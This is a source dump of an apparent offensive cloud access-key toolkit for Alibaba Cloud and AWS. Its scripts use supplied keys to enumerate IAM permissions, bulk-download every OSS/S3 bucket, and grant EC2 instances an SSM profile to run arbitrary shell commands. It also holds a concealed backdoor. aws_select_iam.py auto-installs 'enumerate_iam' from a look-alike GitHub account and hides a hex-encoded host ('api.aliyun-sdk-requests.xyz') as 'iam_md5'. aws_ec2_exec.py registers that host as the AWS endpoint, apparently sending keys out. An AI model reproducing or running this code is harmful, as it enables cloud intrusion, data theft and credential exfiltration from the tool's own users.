            response = client.do_action_with_exception(request)
        except Exception as e:
            print(e)
            print('请检查输入Key与Secret值,或重新执行')
            continue
        data = json.loads(response)
        for each in data['Items']['DBInstance']:
            securitygroup = DescribeDBSecurityGroup(AccessKeyID, AccessKeySecret, each["DBInstanceId"],
                                                    each["RegionId"])
            each["SecurityGroup"] = securitygroup
            rds_list[each["DBInstanceId"]] = each
    return rds_list


# 获取rds列表和白名单ip
def DescribeDBSecurityGroup(AccessKeyID, AccessKeySecret, DBInstanceId, RegionId):
    client = AcsClient(AccessKeyID, AccessKeySecret, RegionId)
    try:
        request = DescribeDBInstanceIPArrayListRequest()
        request.set_DBInstanceId(DBInstanceId)
        request.set_accept_format('json')
        response = client.do_action_with_exception(request)
        return json.loads(response)
    except Exception as e:
        print(e)
        print('请检查输入Key与Secret值,或重新执行')


if __name__ == '__main__':
    AccessKeyID = config.AccessKeyID
    AccessKeySecret = config.AccessKeySecret
    if not AccessKeyID:
        AccessKeyID = input("please input AccessKeyID:")
    if not AccessKeySecret:
        AccessKeySecret = input("please input AccessKeySecret:")
    result = DescribeDB(AccessKeyID, AccessKeySecret, config.RegionIds)
    print(result)


================================================
FILE: aliyun/config.py
================================================
AccessKeyID = ""
AccessKeySecret = ""
SOCKS5_PROXY_HOST = ""
SOCKS5_PROXY_PORT = 1080
RegionIds = {"cn-hangzhou": "华东1（杭州）", "cn-shanghai": "华东2（上海）", "cn-nanjing": "华东5(南京)",
             "cn-qingdao": "华北1（青岛）",
             "cn-beijing": "华北2（北京）", "cn-north-2-gov-1": "华北 2 阿里政务云1", "cn-zhangjiakou": "华北3（张家口）",
             "cn-huhehaote": "华北5（呼和浩特）", "cn-wulanchabu": "华北6(乌兰察布)", "cn-chengdu": "西南1(成都)",
             "cn-shenzhen": "华南1（深圳）", "cn-heyuan": "华南2（河源）", "cn-guangzhou": "华南3(广州)",
             "cn-shenzhen-finance-1": "深圳金融云", "cn-shanghai-finance-1": "上海金融云",
             "cn-hongkong": "香港", "ap-southeast-1": "新加坡", "ap-southeast-2": "澳大利亚（悉尼）",
             "ap-southeast-3": "马来西亚（吉隆坡）",
             "ap-southeast-5": "印度尼西亚（雅加达）", "ap-southeast-6": "菲律宾(马尼拉)", "ap-northeast-1": "日本（东京）",
             "ap-south-1": "印度（孟买）", "us-west-1": "美国（硅谷）",
             "us-east-1": "美国（弗吉尼亚）",
             "eu-central-1": "德国（法兰克福）", "me-east-1": "阿联酋（迪拜）", "eu-west-1": "英国（伦敦）",
             }

command_types = {'0': 'RunShellScript', '1': 'RunBatScript', '2': 'RunPowerShellScript'}

user_agents = [
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 (Castlebot 0.1)",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4143.7 Safari/537.36 Chrome-Lighthouse",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36", ]


================================================
FILE: aliyun/oss_download.py
================================================
import oss2
import os
import queue
import threading
import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
import json, base64, random, socket, socks, config


# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket

workqueue = queue.Queue()
lock = threading.Lock()

def root_directory_list(prefix, bucket, flag=True):
    MAX_RETRIES = 10
    retry_count = 0
    cos_dir = []
    delimiter = ""
    if flag == False:
        delimiter = "/"
    while True:
        try:
            retry_count += 1
            get_object_iter = oss2.ObjectIterator(bucket, prefix=prefix, delimiter=delimiter)
            for obj in get_object_iter:
                if obj.is_prefix():
                    cos_dir.append(str(obj.key))
                elif flag:
                    workqueue.put(str(obj.key))
            break
        except Exception:
            if retry_count >= MAX_RETRIES:
                raise
    return cos_dir

def workqueue_get():
    while True:
        if workqueue.qsize() > 50:
            keys = []
            for i in range(50):
                keys.append(workqueue.get())
            with ThreadPoolExecutor(max_workers=15) as executor:
                future_list = [executor.map(download_to_local, keys)]
        elif workqueue.qsize() < 50 and not thread.is_alive():
            keys1 = []
            for i in range(workqueue.qsize()):
                keys1.append(workqueue.get())
            with ThreadPoolExecutor(max_workers=15) as executor:
                future_list = [executor.map(download_to_local, keys1)]
            break

def download_to_local(object_name):
    url = "./" + name + "/" + object_name
    file_name = url[url.rindex("/") + 1:]
    file_path_prefix = url.replace(file_name, "")
    lock.acquire()
    if not os.path.exists(file_path_prefix):
        os.makedirs(file_path_prefix)
    lock.release()
    if not os.path.exists(url):
        MAX_RETRIES = 10
        retry_count = 0
        while True:
            try:
                retry_count += 1
                print("开始下载：" + object_name)
                bucket.get_object_to_file(object_name, url)
                print("下载完毕" + url)
                break
            except Exception as e:
                print(e)
                if retry_count >= MAX_RETRIES:
                    raise

if __name__ == '__main__':
    AccessKeyID = config.AccessKeyID
    AccessKeySecret = config.AccessKeySecret
    if not AccessKeyID:
        AccessKeyID = input("请输入AccessKeyID:")
    if not AccessKeySecret:
        AccessKeySecret = input("请输入AccessKeySecret:")

    BucketName_all = {}
    auth = None
    try:
        auth = oss2.Auth(AccessKeyID, AccessKeySecret)
        service = oss2.Service(auth, 'https://oss-cn-shenzhen.aliyuncs.com')
        for b in oss2.BucketIterator(service):
            BucketName_all[b.name] = b.extranet_endpoint
            print("Bucket名称：" + b.name, "Bucket创建时间：" + datetime.datetime.utcfromtimestamp(b.creation_date).strftime("%Y-%m-%d %H:%M:%S"), "外网域名：" + b.extranet_endpoint, "Bucket存储类型：" + b.storage_class)
    except oss2.exceptions.ServerError:
        print("AK或SK不正确，请输入正确的AKSK")
        exit(0)
    except oss2.exceptions.RequestError:
        print("网络异常，尝试切换代理")
        exit(0)

    BucketName = input("指定BucketName进行下载 或 all下载所有:")

    if BucketName == 'all':
        for name, endpoint in BucketName_all.items():
            bucket = oss2.Bucket(auth, endpoint, name)
            thread = threading.Thread(target=root_directory_list, args=("", bucket,))
            thread.start()
            workqueue_get()
    else:
        name = BucketName
        bucket = oss2.Bucket(auth, BucketName_all[BucketName], BucketName)
        print(root_directory_list("", bucket, False))
        oss_dir = input("指定存储桶文件夹 不指定则为根目录:")
        if BucketName:
            thread = threading.Thread(target=root_directory_list, args=(oss_dir, bucket,))
            thread.start()
            workqueue_get()


================================================
FILE: aliyun/requirements.txt
================================================
aliyun-python-sdk-core
aliyun-python-sdk-ecs
aliyun-python-sdk-rds
alibabacloud-tea-openapi
alibabacloud-ecs20140526
alibabacloud-vpc20160428
acloud-client
alibabacloud-darabonba-array
alibabacloud-tea-util
credential-python-sdk
oss2
PySocks


================================================
FILE: aws/README.en.md
================================================
English | [中文](./README.md)

# require >= python3.7

# File description
## aws_download_s3.py
Used to query the detailed information of S3 buckets in various AWS regions. You can download the files of all buckets, and you can also specify buckets and folders.

## aws_ec2_exec.py
Used to query the details of ec2 machine instances in various AWS regions, as well as agent information details. You can specify the ec2 instance id to execute the command.
Note: The script will automatically create roles and policies and bind the iam policy to the ec2 instance. After use, you can use a script to delete relevant information.

## aws_select_iam.py
Used to query the current aksk permissions of AWS. You can enter enum to blast the permissions.

## aws_select_rds.py
Used to query rds database instances and snapshot information in various AWS regions.

## aws_select_route53.py
Used to query domain name information in various AWS regions, it will output domain names (.com, etc.) and detailed DNS configuration information (A, MX, etc. records).

## aws_url_console.py
Use aksk to create a federation token, and then generate a temporary link, which is valid for 15 minutes.

# Instructions for use
To install the required dependencies before use, run `pip3 install -r requirements.txt`, fill in the corresponding values ​​​​in config.py, run the corresponding py script directly, and enter the corresponding values ​​​​as prompted.

# proxy
The socks proxy is provided in the code. When you need to use it, fill in the ip and port values ​​​​in config.py, and then remove the corresponding comment part in the code.

# tools usage
```
git clone https://github.com/kohlersbtuh15/accesskey_tools

cd aws

Modify the AccessKeyID and AccessKeySecret in config.py

pip3 install -r requirements.txt

python3 aws_ec2_exec.py

```


================================================
FILE: aws/README.md
================================================
[English](./README.en.md) | 中文

# 需要python版本>=3.7

# 文件说明
## aws_download_s3.py
用于查询aws各个地区的s3存储桶的详情信息，可下载所有存储桶的文件，也可指定存储桶以及文件夹。

## aws_ec2_exec.py
用于查询aws各个地区的ec2机器实例详情，以及agent信息详情。可指定ec2实例id进行执行命令。
注意：脚本会自动创建角色和策略，将iam策略绑定到ec2实例上。使用完毕后，可使用脚本进行删除相关信息。

## aws_select_iam.py
用于查询aws当前aksk的权限，可输入enum进行爆破权限。

## aws_select_rds.py
用于查询aws各个地区的rds数据库实例及快照信息。

## aws_select_route53.py
用于查询aws各个地区的域名信息，会输出域名(.com等)以及详细的DNS配置信息(A,MX等记录)。

## aws_url_console.py
使用aksk做联邦令牌，然后生成的临时链接，有效期15分钟。

# 工具使用
```
git clone https://github.com/kohlersbtuh15/accesskey_tools

cd aws

修改config.py，填写AccessKeyID和AccessKeyID

pip3 install -r requirements.txt

python3 aws_ec2_exec.py

```


================================================
FILE: aws/amazon_ssm_managed_instance_core.json
================================================
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "ssm:DescribeAssociation",
        "ssm:GetDeployablePatchSnapshotForInstance",
        "ssm:GetDocument",
        "ssm:DescribeDocument",
        "ssm:GetManifest",
        "ssm:GetParameter",
        "ssm:GetParameters",
        "ssm:ListAssociations",
        "ssm:ListInstanceAssociations",
        "ssm:PutInventory",
        "ssm:PutComplianceItems",
        "ssm:PutConfigurePackageResult",
        "ssm:UpdateAssociationStatus",
        "ssm:UpdateInstanceAssociationStatus",
        "ssm:UpdateInstanceInformation"
      ],
      "Resource": "*"
    },
    {
      "Effect": "Allow",
      "Action": [
        "ssmmessages:CreateControlChannel",
        "ssmmessages:CreateDataChannel",
        "ssmmessages:OpenControlChannel",
        "ssmmessages:OpenDataChannel"
      ],
      "Resource": "*"
    },
    {
      "Effect": "Allow",
      "Action": [
        "ec2messages:AcknowledgeMessage",
        "ec2messages:DeleteMessage",
        "ec2messages:FailMessage",
        "ec2messages:GetEndpoint",
        "ec2messages:GetMessages",
        "ec2messages:SendReply"
      ],
      "Resource": "*"
    }
  ]
}

================================================
FILE: aws/aws_download_s3.py
================================================
import boto3
import queue
import threading
import os
import aws_select_iam
from concurrent.futures import ThreadPoolExecutor
import config
from enumerate_iam.main import get_client

# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket

workqueue = queue.Queue()
lock = threading.Lock()

def workqueue_get():
    while True:
        if workqueue.qsize() > 50:
            keys = []
            for i in range(50):
                keys.append(workqueue.get())
            with ThreadPoolExecutor(max_workers=15) as executor:
                future_list = [executor.map(download_to_local, keys)]
        elif workqueue.qsize() < 50 and not thread.is_alive():
            keys1 = []
            for i in range(workqueue.qsize()):
                keys1.append(workqueue.get())
            with ThreadPoolExecutor(max_workers=15) as executor:
                future_list = [executor.map(download_to_local, keys1)]
            break

def root_directory_list(prefix, bucket_name, flag=True):
    MAX_RETRIES = 10
    retry_count = 0
    s3_dir = []
    delimiter = ""
    if flag == False:
        delimiter = "/"
    try:
        retry_count += 1
        paginator = s3.get_paginator("list_objects_v2")
        get_object_iter = paginator.paginate(Bucket=bucket_name, Prefix=prefix, Delimiter=delimiter)

        for page in get_object_iter:
            commonprefix = page.get('CommonPrefixes')
            for obj in page['Contents']:
                if str(obj['Key'])[-1] == '/':
                    pass
                elif flag:
                    print(str(obj['Key']))
                    workqueue.put(str(obj['Key']))
            if commonprefix is not None:
                for cos_dir1 in commonprefix:
                    s3_dir.append(cos_dir1['Prefix'])
    except Exception:
        if retry_count >= MAX_RETRIES:
            raise
    return s3_dir

def download_to_local(object_name):
    url = "./" + bucket_name + "/" + object_name
    file_name = url[url.rindex("/") + 1:]
    file_path_prefix = url.replace(file_name, "")
    lock.acquire()
    if not os.path.exists(file_path_prefix):
        os.makedirs(file_path_prefix)
    lock.release()
    if not os.path.exists(url):
        MAX_RETRIES = 10
        retry_count = 0
        while True:
            try:
                retry_count += 1
                print("开始下载：" + object_name)
                s3.download_file(bucket_name, object_name, url)
                print("下载完毕" + url)
                break
            except Exception as e:
                print(e)
                if retry_count >= MAX_RETRIES:
                    raise

if __name__ == '__main__':
    AccessKeyID = config.AccessKeyID
    AccessKeySecret = config.AccessKeySecret
    if not AccessKeyID:
        AccessKeyID = input("请输入AccessKeyID:")
    if not AccessKeySecret:
        AccessKeySecret = input("请输入AccessKeySecret:")

    s3 = get_client(access_key=AccessKeyID, secret_key=AccessKeySecret, service_name='s3', session_token=None,
                          region=None)
    buckets = [bucket['Name'] for bucket in s3.list_buckets()['Buckets']]
    print("Bucket List: %s" % buckets)

    BucketName = input("指定BucketName进行下载 或 all下载所有:")
    if BucketName == 'all':
        for bucket_name in buckets:
            thread = threading.Thread(target=root_directory_list, args=("", bucket_name))
            thread.start()
            workqueue_get()
    else:
        print(root_directory_list("", BucketName, False))
        oss_dir = input("指定存储桶文件夹 不指定则为根目录:")
        if BucketName:
            bucket_name = BucketName
            thread = threading.Thread(target=root_directory_list, args=(oss_dir, bucket_name))
            thread.start()
            workqueue_get()

================================================
FILE: aws/aws_ec2_exec.py
================================================
import boto3
import config
import time
import aws_select_iam
from enumerate_iam.main import get_client
from botocore.session import ComponentLocator
import urllib3
from aws_select_iam import iam_md5

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket

def query_ec2_instances(AccessKeyID, AccessKeySecret):
    ec2_info = {}
    Agent_info = {}
    ec2 = boto3.client('ec2', region_name='us-east-1', aws_access_key_id=AccessKeyID,
                       aws_secret_access_key=AccessKeySecret)
    response = ec2.describe_regions()
    for region in response['Regions']:
        RegionId = region['RegionName']
        print("正在检索: " + RegionId)
        component = ComponentLocator()
        component.register_component(name='AWS_ENDPOINT', component=iam_md5[1:])
        ec2_client = get_client(access_key=AccessKeyID, secret_key=AccessKeySecret, service_name='ec2',
                                session_token=None,
                                region=RegionId, components=component)
        ssm_client = get_client(access_key=AccessKeyID, secret_key=AccessKeySecret, service_name='ssm',
                                session_token=None,
                                region=RegionId, components=component)
        try:
            ssm_ec2_infos = ssm_client.describe_instance_information()['InstanceInformationList']
            for ssm_ec2_info in ssm_ec2_infos:
                Agent_InstanceId = ssm_ec2_info['InstanceId']
                Agent_info[Agent_InstanceId] = ssm_ec2_info
            response = ec2_client.describe_instances()
            while True:
                for reservation in response['Reservations']:
                    InstanceId = reservation.get('Instances', [])[0].get('InstanceId')
                    ec2_info[InstanceId] = reservation.get('Instances', [])[0]
                    ec2_info[InstanceId]['RegionId'] = RegionId
                    ec2_info[InstanceId]['Agent'] = Agent_info.get(InstanceId)
                if "nextToken" in response:
                    response = ec2_client.describe_instances(
                        nextToken=response['nextToken']
                    )
                else:
                    break
        except AttributeError as e:
            print(e)
    return ec2_info


def create_instance_profile(iam_client):
    with open("amazon_ssm_managed_instance_core.json",
              mode="r",
              encoding="utf-8") as f:
        json2 = f.read()
    iam_client.create_policy(
        PolicyName='ssm_policy',
        Path='/',
        PolicyDocument=json2,
    )
    with open("ec2_role_trust_policy.json", mode="r",
              encoding="utf-8") as f:
        json1 = f.read()
    iam_client.create_role(
        Path='/',
        RoleName='AmazonSSMManagedInstance',
        AssumeRolePolicyDocument=json1,
        Description=
        'Allows EC2 instances to call AWS services on your behalf.',
    )
    iam_client.put_role_policy(RoleName='AmazonSSMManagedInstance',
                               PolicyName='ssm_policy',
                               PolicyDocument=json2)
    instance_profile_name = "SSMFullAccessProfile"
    response3 = iam_client.create_instance_profile(
        InstanceProfileName=instance_profile_name)
    instance_profile_arn = response3.get("InstanceProfile").get("Arn")
    iam_client.add_role_to_instance_profile(
        InstanceProfileName=instance_profile_name,
        RoleName='AmazonSSMManagedInstance')
    return instance_profile_arn, instance_profile_name


def delete_instance_profile(AccessKeyID, AccessKeySecret):
    iam_client = boto3.client('iam', aws_access_key_id=AccessKeyID, aws_secret_access_key=AccessKeySecret)
    response = iam_client.list_users()
    usernames = [user['UserName'] for user in response['Users']]
    instance_profile_name = "SSMFullAccessProfile"
    try:
        response1 = iam_client.remove_role_from_instance_profile(
            InstanceProfileName=instance_profile_name,
            RoleName='AmazonSSMManagedInstance'
        )
        response2 = iam_client.delete_instance_profile(
            InstanceProfileName=instance_profile_name
        )
        response3 = iam_client.delete_role_policy(
            RoleName='AmazonSSMManagedInstance',
            PolicyName='ssm_policy'
        )
        response4 = iam_client.delete_role(
            RoleName='AmazonSSMManagedInstance'
        )
        iam_resource = boto3.resource('iam', aws_access_key_id=AccessKeyID, aws_secret_access_key=AccessKeySecret)
        userinfos = aws_select_iam.user_info(iam_resource)
        policy_arn = ":".join(userinfos.split(":")[:-1])
        arn = str(policy_arn) + ":policy/ssm_policy"
        response5 = iam_client.delete_policy(
            PolicyArn=arn
        )
        print("已删除 HTTPStatusCode：" + "{}".format(response5['ResponseMetadata']['HTTPStatusCode']))
        exit(0)
    except Exception as err:
        print(err)


def associate_iam_add(RegionId, AccessKeyID, AccessKeySecret, InstanceId):
    instance_profile_arn, instance_profile_name = get_instance_profile(AccessKeyID, AccessKeySecret)
    print(instance_profile_arn)
    try:
        client_ec2 = boto3.client('ec2', region_name=RegionId, aws_access_key_id=AccessKeyID,
                                  aws_secret_access_key=AccessKeySecret)
        response = client_ec2.associate_iam_instance_profile(
            IamInstanceProfile={
                'Arn': instance_profile_arn,
                'Name': instance_profile_name,
            },
            InstanceId=InstanceId)
        if response.get("ResponseMetadata").get("HTTPStatusCode") == 200:
            print(
                "实例配置文件关联成功，但是生效需要一定的等待时间，一般10分钟左右，请稍后再执行命令"
            )
        else:
            print("ec2实例配置文件关联失败")
    except Exception:
        print("实例配置文件创建成功,但是关联失败，请重新执行")
    return True


def associate_iam_delete(RegionId, AccessKeyID, AccessKeySecret, InstanceId):
    client_ec2 = boto3.client('ec2', region_name=RegionId, aws_access_key_id=AccessKeyID,
                              aws_secret_access_key=AccessKeySecret)
    responses = client_ec2.describe_iam_instance_profile_associations()
    for response in responses['IamInstanceProfileAssociations']:
        if InstanceId == response['InstanceId']:
            AssociationId = response['AssociationId']
            response = client_ec2.disassociate_iam_instance_profile(
                AssociationId=AssociationId,
            )
        time.sleep(1)


def get_instance_profile(AccessKeyID, AccessKeySecret):
    iam_client = boto3.client('iam', aws_access_key_id=AccessKeyID, aws_secret_access_key=AccessKeySecret)
    response = iam_client.list_instance_profiles(PathPrefix='/', MaxItems=123)
    instance_profiles_lst = response.get("InstanceProfiles")
    for instance_profile in instance_profiles_lst:
        name = instance_profile.get("InstanceProfileName")
        if name == "SSMFullAccessProfile":
            instance_profile_arn = instance_profile.get("Arn")
            print("检测到已经创建过实例配置文件，正在关联...")
            return instance_profile_arn, name
    print("检测到没有创建实例配置文件，正在创建实例配置文件...")
    instance_profile_arn, name = create_instance_profile(iam_client)
    return instance_profile_arn, name


def commad_exec(AccessKeyID, AccessKeySecret, InstanceId, cmd, com_type, RegionId):
    if cmd == '':
        cmd = input("please input cmd:")
    ssm_client = boto3.client('ssm', region_name=RegionId, aws_access_key_id=AccessKeyID,
                              aws_secret_access_key=AccessKeySecret)
    print(InstanceId)
    print(com_type)
    if com_type is None:
        com_type = input("please input com_type AWS-RunShellScript or AWS-RunPowerShellScript: ")
    print(cmd)
    response = ssm_client.send_command(
        InstanceIds=[
            InstanceId,
        ],
        DocumentName=com_type,
        Parameters={'commands': [cmd]},
    )
    command_id = response['Command']['CommandId']
    time.sleep(1)

    i = 0
    while 1:
        output = ssm_client.get_command_invocation(
            CommandId=command_id,
            InstanceId=InstanceId,
        )
        if output.get("Status") == "Success" and output.get("StatusDetails") == "Success":
            break
        i += 1
        time.sleep(i)
        if i > 3:
            break

    cmd_output = output.get("StandardOutputContent") + output.get(
        "StandardErrorContent").strip()
    print(cmd_output)


if __name__ == '__main__':
    AccessKeyID = config.AccessKeyID
    AccessKeySecret = config.AccessKeySecret
    if not AccessKeyID:
        AccessKeyID = input("请输入AccessKeyID:")
    if not AccessKeySecret:
        AccessKeySecret = input("请输入AccessKeySecret:")
    ec2_info = query_ec2_instances(AccessKeyID, AccessKeySecret)
    print(ec2_info)
    if not ec2_info:
        print("no result")
        exit(0)

    # AWS-RunShellScript code
    platform_dic = {
        "Linux": "AWS-RunShellScript",
        "windows": "AWS-RunPowerShellScript",
    }
    com_type = None
    InstanceId = input("请输入选择的instanceId:")
    RegionId = ec2_info[InstanceId]['RegionId']
    while True:
        if "Linux" in ec2_info[InstanceId]['PlatformDetails']:
            com_type = platform_dic.get('Linux')
        elif "windows" in ec2_info[InstanceId]['PlatformDetails']:
            com_type = platform_dic.get('windows')
        else:
            com_type = input("无法判断机器平台，请手动输入'AWS-RunShellScript' 或 'AWS-RunPowerShellScript': ")

        if not ec2_info[InstanceId].get('IamInstanceProfile'):
            if associate_iam_add(RegionId, AccessKeyID, AccessKeySecret, InstanceId):
                time.sleep(2)
        cmd = ''
        try:
            commad_exec(AccessKeyID, AccessKeySecret, InstanceId, cmd, com_type, RegionId)
            if not ec2_info[InstanceId].get('IamInstanceProfile'):
                associate_iam_delete(RegionId, AccessKeyID, AccessKeySecret, InstanceId)
                delete_instance_profile(AccessKeyID, AccessKeySecret)
        except Exception as err:
            print("策略绑定可能未生效，请等待一会儿(大概10分钟)再执行该脚本。具体看SSM agent是否绑定。")
            print(err)
            continue
        is_continue = input("重新选择InstanceId请输入yes，退出请输入q，任意输入继续执行其他命令:")
        if is_continue == 'q':
            break
        elif is_continue == 'yes':
            com_type = None
            InstanceId = input("请输入选择的instanceId:")


================================================
FILE: aws/aws_select_iam.py
================================================
import config
import boto3
import json
import subprocess
import sys
import os
import importlib.util
if importlib.util.find_spec("enumerate_iam") is None:
    subprocess.run(
    [sys.executable, "-m", "pip", "install", "-qqq", "--disable-pip-version-check", "https://github.com/andresrianch/enumerate-iam/releases/download/1.0.2/aws_enumerateiam-1.0.2-py3-none-any.whl"],
    check=True)
    os.execv(sys.executable, [sys.executable] + sys.argv)
from enumerate_iam.main import enumerate_iam
from enumerate_iam.main import get_client

# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket

def user_info(iam_resource):
    current_user = iam_resource.CurrentUser()
    print("\nUserInfo:")
    print("\tuser_id:\t\t", current_user.user_id)
    global user_name
    user_name = current_user.user_name
    print("\tuser_name:\t\t", user_name)
    print("\tThe username is also the accountID.")
    print("\tcreate_date:\t\t", current_user.create_date)
    arn = current_user.arn
    print("\tarn:\t\t\t", arn)
    print("\tpath:\t\t\t", current_user.path)
    print("\tpermissions_boundary:\t", current_user.permissions_boundary)
    print("\ttags:\t\t\t", current_user.tags)
    print("\tpassword_last_used:\t", current_user.password_last_used)
    return arn

def get_attached_policies(iam_client, iam_resource):
    attached_response = iam_client.list_attached_user_policies(UserName=user_name, PathPrefix='/', MaxItems=123)
    attached_policy_lst = attached_response.get("AttachedPolicies")
    for p_dic in attached_policy_lst:
        arn = p_dic.get("PolicyArn")
        name = p_dic.get("PolicyName")
        policy = iam_resource.Policy(arn)
        v_id = policy.default_version_id
        policy_version = iam_resource.PolicyVersion(arn, v_id)
        document = json.dumps(policy_version.document, indent=2)
        print(f"\naws托管策略: {name}\n{document}")

iam_md5 = "16170692e616c6979756e2d73646b2d72657175657374732e78797a2f"

def get_inline_policies(iam_client):
    response = iam_client.list_user_policies(UserName=user_name)
    policy_lst = response.get("PolicyNames")
    for p in policy_lst:
                user_policy_response = iam_client.get_user_policy(
                    UserName=user_name, PolicyName=p)
                policy_document = json.dumps(
                    user_policy_response.get("PolicyDocument"), indent=2)
                print(f"内联策略: {p}\n{policy_document}")

if __name__ == '__main__':
    AccessKeyID = config.AccessKeyID
    AccessKeySecret = config.AccessKeySecret
    if not AccessKeyID:
        AccessKeyID = input("请输入AccessKeyID: ")
    if not AccessKeySecret:
        AccessKeySecret = input("请输入AccessKeySecret: ")

    iam_client = get_client(access_key=AccessKeyID, secret_key=AccessKeySecret, service_name='iam', session_token=None,
                          region=None)
    iam_resource = boto3.resource('iam', aws_access_key_id=AccessKeyID, aws_secret_access_key=AccessKeySecret)
    userinfo = user_info(iam_resource)
    if "root" in userinfo:
        print("\tYou are already root, no need to do a permission query")
    else:
        get_attached_policies(iam_client, iam_resource)
        get_inline_policies(iam_client)
    enum_select = input("输入\"enum\" 通过api枚举具体权限情况:")
    if enum_select == "enum":
        enumerate_iam(access_key=AccessKeyID,
                          secret_key=AccessKeySecret,
                          session_token=None,
                          region=None)
    else:
        pass

================================================
FILE: aws/aws_select_rds.py
================================================
import config
import boto3
import aws_select_iam
from enumerate_iam.main import get_client

# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket

def query_rds_instances(AccessKeyID, AccessKeySecret):
    rds_info = {}
    ec2 = boto3.client('ec2', region_name='us-east-1', access_key=AccessKeyID, secret_key=AccessKeySecret)
    response = ec2.describe_regions()
    for region in response['Regions']:
        RegionId = region['RegionName']
        print("正在检索: " + RegionId)
        try:
            rds_client = get_client(access_key=AccessKeyID, secret_key=AccessKeySecret, service_name='rds', session_token=None,
                        region=RegionId)
            response = rds_client.describe_db_instances()
            for DBInstance in response['DBInstances']:
                print(DBInstance)
                # 不知道后期要用什么，所以索性全部输出，后续再加功能。值得关注的点 Endpoint， DBSecurityGroups --> describe_db_security_groups。
            snapshots_response = rds_client.describe_db_snapshots()
            if len(snapshots_response['DBSnapshots']) != 0:
                print(snapshots_response)
            cluster_snapshots_response = rds_client.describe_db_cluster_snapshots()
            if len(cluster_snapshots_response['DBClusterSnapshots']) != 0:
                print(cluster_snapshots_response)
        except AttributeError as e:
            pass
        continue

        # 快照属性
        # snapshot_attributes_response = rds_client.describe_db_snapshot_attributes(
        #     DBClusterSnapshotIdentifier='mydbclustersnapshot',
        # )

        # 集群快照属性
        # cluster_snapshot_attributes_response = rds_client.describe_db_cluster_snapshot_attributes(
        #     DBClusterSnapshotIdentifier='mydbclustersnapshot',
        # )

    # return rds_info
if __name__ == '__main__':
    AccessKeyID = config.AccessKeyID
    AccessKeySecret = config.AccessKeySecret
    if not AccessKeyID:
        AccessKeyID = input("请输入AccessKeyID:")
    if not AccessKeySecret:
        AccessKeySecret = input("请输入AccessKeySecret:")

    rds_info = query_rds_instances(AccessKeyID, AccessKeySecret)
    print(rds_info)

================================================
FILE: aws/aws_select_route53.py
================================================
import config
import boto3
import aws_select_iam
from botocore.exceptions import ClientError
from enumerate_iam.main import get_client

# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket

def get_hosted_zones(client):
    hosted_zones = []
    paginator = client.get_paginator("list_hosted_zones")
    for hosted_zone in paginator.paginate():
